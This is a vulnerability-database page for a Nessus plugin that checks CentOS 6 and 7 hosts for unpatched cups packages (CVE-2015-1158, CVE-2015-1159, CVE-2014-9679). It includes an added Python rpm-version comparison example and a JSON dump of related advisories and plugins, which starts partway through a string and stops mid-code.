ID: CENTOS_RHSA-2015-1123.NASL
Type: nessus
Reporter: This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified: 2015-06-19T00:00:00
Description

Updated cups packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 6 and 7.

Red Hat Product Security has rated this update as having Important
security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.

CUPS provides a portable printing layer for Linux, UNIX, and similar
operating systems.

A string reference count bug was found in cupsd, causing premature
freeing of string objects. An attacker can submit a malicious print
job that exploits this flaw to dismantle ACLs protecting privileged
operations, allowing a replacement configuration file to be uploaded,
which in turn allows the attacker to run arbitrary code in the CUPS
server. (CVE-2015-1158)

A cross-site scripting flaw was found in the cups web templating
engine. An attacker could use this flaw to bypass the default
configuration settings that bind the CUPS scheduler to the 'localhost'
or loopback interface. (CVE-2015-1159)

An integer overflow leading to a heap-based buffer overflow was found
in the way cups handled compressed raster image files. An attacker
could create a specially crafted image file which, when passed through the
cups Raster filter, could cause the cups filter to crash.
(CVE-2014-9679)

Red Hat would like to thank the CERT/CC for reporting the CVE-2015-1158
and CVE-2015-1159 issues.

All cups users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues. After installing
this update, the cupsd daemon will be restarted automatically.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2015:1123 and
# CentOS Errata and Security Advisory 2015:1123 respectively.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
  script_id(84276);
  script_version("2.11");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");

  script_cve_id("CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159");
  script_bugtraq_id(72594, 75098, 75106);
  script_xref(name:"RHSA", value:"2015:1123");

  script_name(english:"CentOS 6 / 7 : cups (CESA-2015:1123)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote CentOS host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Updated cups packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 6 and 7.

Red Hat Product Security has rated this update as having Important
security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.

CUPS provides a portable printing layer for Linux, UNIX, and similar
operating systems.

A string reference count bug was found in cupsd, causing premature
freeing of string objects. An attacker can submit a malicious print
job that exploits this flaw to dismantle ACLs protecting privileged
operations, allowing a replacement configuration file to be uploaded
which in turn allows the attacker to run arbitrary code in the CUPS
server (CVE-2015-1158)

A cross-site scripting flaw was found in the cups web templating
engine. An attacker could use this flaw to bypass the default
configuration settings that bind the CUPS scheduler to the 'localhost'
or loopback interface. (CVE-2015-1159)

An integer overflow leading to a heap-based buffer overflow was found
in the way cups handled compressed raster image files. An attacker
could create a specially crafted image file, which when passed via the
cups Raster filter, could cause the cups filter to crash.
(CVE-2014-9679)

Red Hat would like to thank the CERT/CC for reporting CVE-2015-1158
and CVE-2015-1159 issues.

All cups users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues. After installing
this update, the cupsd daemon will be restarted automatically."
  );
  # https://lists.centos.org/pipermail/centos-announce/2015-June/021178.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?124ba55b"
  );
  # https://lists.centos.org/pipermail/centos-announce/2015-June/021179.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?646be46a"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected cups packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-1158");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups-client");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups-filesystem");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups-ipptool");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups-libs");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups-lpd");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups-php");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:centos:centos:6");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:centos:centos:7");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/02/19");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/06/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/06/19");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"CentOS Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/CentOS/release", "Host/CentOS/rpm-list");

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/CentOS/release");
if (isnull(release) || "CentOS" >!< release) audit(AUDIT_OS_NOT, "CentOS");
os_ver = pregmatch(pattern: "CentOS(?: Linux)? release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "CentOS");
os_ver = os_ver[1];
if (! preg(pattern:"^(6|7)([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "CentOS 6.x / 7.x", "CentOS " + os_ver);
if (!get_kb_item("Host/CentOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "CentOS", cpu);
flag = 0;
if (rpm_check(release:"CentOS-6", reference:"cups-1.4.2-67.el6_6.1")) flag++;
if (rpm_check(release:"CentOS-6", reference:"cups-devel-1.4.2-67.el6_6.1")) flag++;
if (rpm_check(release:"CentOS-6", reference:"cups-libs-1.4.2-67.el6_6.1")) flag++;
if (rpm_check(release:"CentOS-6", reference:"cups-lpd-1.4.2-67.el6_6.1")) flag++;
if (rpm_check(release:"CentOS-6", reference:"cups-php-1.4.2-67.el6_6.1")) flag++;
if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"cups-1.6.3-17.el7_1.1")) flag++;
if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"cups-client-1.6.3-17.el7_1.1")) flag++;
if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"cups-devel-1.6.3-17.el7_1.1")) flag++;
if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"cups-filesystem-1.6.3-17.el7_1.1")) flag++;
if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"cups-ipptool-1.6.3-17.el7_1.1")) flag++;
if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"cups-libs-1.6.3-17.el7_1.1")) flag++;
if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"cups-lpd-1.6.3-17.el7_1.1")) flag++;
if (flag)
{
  security_report_v4(
    port     : 0,
    severity : SECURITY_HOLE,
    extra    : rpm_report_get()
  );
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "cups / cups-client / cups-devel / cups-filesystem / cups-ipptool / etc");
}
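The plugin's detection logic is the chain of rpm_check() calls above: each installed cups package is compared, rpm-style, against the fixed build from the errata, and for CentOS 7 only x86_64 packages are considered. The following added example (written for this page, not Tenable's rpm.inc) re-implements that comparison in Python so the outcome can be checked by hand against a constructed `rpm -qa` listing; the treatment of noarch packages as matching any cpu is an assumption, and tilde/caret ordering is omitted because none of the page's references use it.

```python
import re

# Fixed references copied from the plugin's rpm_check() lines (CESA-2015:1123).
# For CentOS-7 the plugin passes cpu:"x86_64", so only that arch is checked.
FIXED = {
    "CentOS-6": (None, [
        "cups-1.4.2-67.el6_6.1", "cups-devel-1.4.2-67.el6_6.1",
        "cups-libs-1.4.2-67.el6_6.1", "cups-lpd-1.4.2-67.el6_6.1",
        "cups-php-1.4.2-67.el6_6.1"]),
    "CentOS-7": ("x86_64", [
        "cups-1.6.3-17.el7_1.1", "cups-client-1.6.3-17.el7_1.1",
        "cups-devel-1.6.3-17.el7_1.1", "cups-filesystem-1.6.3-17.el7_1.1",
        "cups-ipptool-1.6.3-17.el7_1.1", "cups-libs-1.6.3-17.el7_1.1",
        "cups-lpd-1.6.3-17.el7_1.1"]),
}

# A version/release string is read as alternating runs of digits and letters;
# every other character is a separator (so 67.el6_6.1 -> 67, el, 6, 6, 1).
_SEG = re.compile(r"\d+|[A-Za-z]+")


def rpmvercmp(a, b):
    """Compare two version or release strings like rpm's rpmvercmp().

    Numeric runs compare as integers, alpha runs lexically, a numeric run
    beats an alpha run, and the string with segments left over is newer.
    Returns -1, 0 or 1.  Tilde/caret handling is deliberately omitted.
    """
    if a == b:
        return 0
    sa, sb = _SEG.findall(a), _SEG.findall(b)
    for x, y in zip(sa, sb):
        if x.isdigit() and y.isdigit():
            if int(x) != int(y):
                return -1 if int(x) < int(y) else 1
        elif x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1
        elif x != y:
            return -1 if x < y else 1
    if len(sa) == len(sb):
        return 0
    return 1 if len(sa) > len(sb) else -1


def split_nvr(nvr):
    """'cups-libs-1.4.2-67.el6_6.1' -> ('cups-libs', '1.4.2', '67.el6_6.1')."""
    name, ver, rel = nvr.rsplit("-", 2)
    return name, ver, rel


def split_nvra(nvra):
    """'cups-libs-1.4.2-67.el6_6.1.x86_64' -> (name, ver, rel, 'x86_64')."""
    nvr, arch = nvra.rsplit(".", 1)
    return split_nvr(nvr) + (arch,)


def evr_cmp(ver_a, rel_a, ver_b, rel_b):
    """Version decides first; release only breaks a tie (no epochs here)."""
    return rpmvercmp(ver_a, ver_b) or rpmvercmp(rel_a, rel_b)


def rpm_check(installed_nvra, reference_nvr, cpu=None):
    """True when an installed package with the reference's name is older
    than the fixed build.  With cpu set, only that arch is considered
    (noarch is assumed here to match any cpu), like the plugin's cpu: argument."""
    name, ver, rel, arch = split_nvra(installed_nvra)
    ref_name, ref_ver, ref_rel = split_nvr(reference_nvr)
    if name != ref_name:
        return False
    if cpu is not None and arch not in (cpu, "noarch"):
        return False
    return evr_cmp(ver, rel, ref_ver, ref_rel) < 0


def vulnerable_packages(release, rpm_list):
    """Installed packages that CESA-2015:1123 still applies to."""
    cpu, references = FIXED[release]
    hits = []
    for nvra in rpm_list:
        if any(rpm_check(nvra, ref, cpu) for ref in references):
            hits.append(nvra)
    return hits


# Constructed 'rpm -qa' output for a CentOS 6 host; not captured from a real system.
SAMPLE_CENTOS6 = [
    "cups-libs-1.4.2-50.el6_4.3.x86_64",   # older release: still vulnerable
    "cups-libs-1.4.2-67.el6_6.1.i686",     # exactly the fixed build
    "cups-1.4.2-67.el6.x86_64",            # 67.el6 sorts before 67.el6_6.1
    "cups-devel-1.4.2-67.el6_7.1.x86_64",  # later errata build: already fixed
    "bash-4.1.2-29.el6.x86_64",            # unrelated package, ignored
]

if __name__ == "__main__":
    for pkg in vulnerable_packages("CentOS-6", SAMPLE_CENTOS6):
        print("vulnerable:", pkg)
```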
After installing this\nupdate, the cupsd daemon will be restarted automatically.\n", "modified": "2018-06-06T20:24:10", "published": "2015-06-17T04:00:00", "id": "RHSA-2015:1123", "href": "https://access.redhat.com/errata/RHSA-2015:1123", "type": "redhat", "title": "(RHSA-2015:1123) Important: cups security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:27:00", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "**CentOS Errata and Security Advisory** CESA-2015:1123\n\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing\nof string objects. An attacker can submit a malicious print job that\nexploits this flaw to dismantle ACLs protecting privileged operations,\nallowing a replacement configuration file to be uploaded which in turn\nallows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An \nattacker could use this flaw to bypass the default configuration settings \nthat bind the CUPS scheduler to the 'localhost' or loopback interface.\n(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in\nthe way cups handled compressed raster image files. An attacker could\ncreate a specially-crafted image file, which when passed via the cups\nRaster filter, could cause the cups filter to crash. (CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and \nCVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing this\nupdate, the cupsd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-June/033216.html\nhttp://lists.centos.org/pipermail/centos-announce/2015-June/033217.html\n\n**Affected packages:**\ncups\ncups-client\ncups-devel\ncups-filesystem\ncups-ipptool\ncups-libs\ncups-lpd\ncups-php\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1123.html", "edition": 3, "modified": "2015-06-18T11:30:45", "published": "2015-06-18T11:29:43", "href": "http://lists.centos.org/pipermail/centos-announce/2015-June/033216.html", "id": "CESA-2015:1123", "title": "cups security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:24", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "[1:1.4.2-67.1]\n- CVE-2015-1158, CVE-2015-1159, CVE-2014-9679 (bug #1229982).", "edition": 4, "modified": "2015-06-17T00:00:00", "published": "2015-06-17T00:00:00", "id": "ELSA-2015-1123", "href": "http://linux.oracle.com/errata/ELSA-2015-1123.html", "title": "cups security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-01T01:21:04", "description": "A string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. 
(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)", "edition": 25, "published": "2015-07-08T00:00:00", "title": "Amazon Linux AMI : cups (ALAS-2015-559)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:cups-devel", "p-cpe:/a:amazon:linux:cups-libs", "p-cpe:/a:amazon:linux:cups", "p-cpe:/a:amazon:linux:cups-php", "p-cpe:/a:amazon:linux:cups-lpd", "p-cpe:/a:amazon:linux:cups-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-559.NASL", "href": "https://www.tenable.com/plugins/nessus/84595", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-559.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84595);\n script_version(\"2.2\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_xref(name:\"ALAS\", value:\"2015-559\");\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"Amazon Linux AMI : cups (ALAS-2015-559)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A string reference count bug was found in cupsd, causing premature\nfreeing of string objects. 
An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-559.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update cups' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/08\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"cups-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-debuginfo-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-devel-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-libs-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-lpd-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-php-1.4.2-67.21.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-debuginfo / cups-devel / cups-libs / cups-lpd / etc\");\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:48:47", "description": "A string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nAfter installing this update, the cupsd daemon will be restarted\nautomatically.", "edition": 15, "published": "2015-06-18T00:00:00", "title": "Scientific Linux Security Update : cups on SL6.x, SL7.x i386/x86_64 (20150617)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-18T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:cups-ipptool", "p-cpe:/a:fermilab:scientific_linux:cups-debuginfo", "p-cpe:/a:fermilab:scientific_linux:cups-client", "p-cpe:/a:fermilab:scientific_linux:cups-lpd", "p-cpe:/a:fermilab:scientific_linux:cups-php", "p-cpe:/a:fermilab:scientific_linux:cups-filesystem", "p-cpe:/a:fermilab:scientific_linux:cups-libs", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:cups", "p-cpe:/a:fermilab:scientific_linux:cups-devel"], "id": "SL_20150617_CUPS_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/84259", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable 
Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84259);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n\n script_name(english:\"Scientific Linux Security Update : cups on SL6.x, SL7.x i386/x86_64 (20150617)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. 
An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nAfter installing this update, the cupsd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1506&L=scientific-linux-errata&F=&S=&P=11940\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0667d822\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-debuginfo-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-debuginfo-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) 